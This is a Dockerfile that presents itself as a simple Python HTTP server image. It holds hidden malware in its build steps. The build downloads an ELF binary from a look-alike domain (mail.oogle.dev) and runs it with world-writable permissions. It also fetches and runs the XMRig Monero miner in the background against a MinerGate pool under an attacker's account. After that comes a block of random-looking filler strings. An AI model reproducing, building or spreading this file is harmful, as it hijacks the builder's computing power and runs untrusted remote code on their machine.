FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo mp5TKRJg2aWn8CdKE2rLJrTPPnMQ3jSw AcEbHqPp6mShWFolT3hPYIDdVJ3tHhnR fh8zYCtp5148yLJdMqv8bFxUk2DUEbSr vhXc5kztzjpXhGQ9yQWlQwKQanO6XNDR XOg17vbEXvlQ0q0830PzrtdIIn8A47S7 5IvfdooTgpPTn8v9jrB4sAr3ifiFbb4Q Wx1nZRKuio0XtFnoys7QNEZ4WZ7IcyEU vbWv9J4RIAgKvnhiOJL8pGuxDdDAXnY4 D3xrpP1IkOIF4u2PrqlBztDO87DwYwTb dP9YzYH1Jghi0BrJjcQzJhcpni0eTiCy 0MA08NqkyIy8r1dnsSsboraKkkGLcSlr blmGemxfcHhVLE2lR443Xjxrrzfhv795 54ldDZoiGFeZA6KmXubdNoputfqqWo9r fvQNDOkxQeUUlNFWXv2lInMZk9T0BNuV ijkmOyJuDd5wDCt65a2T5UuqHsqZRhjp DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]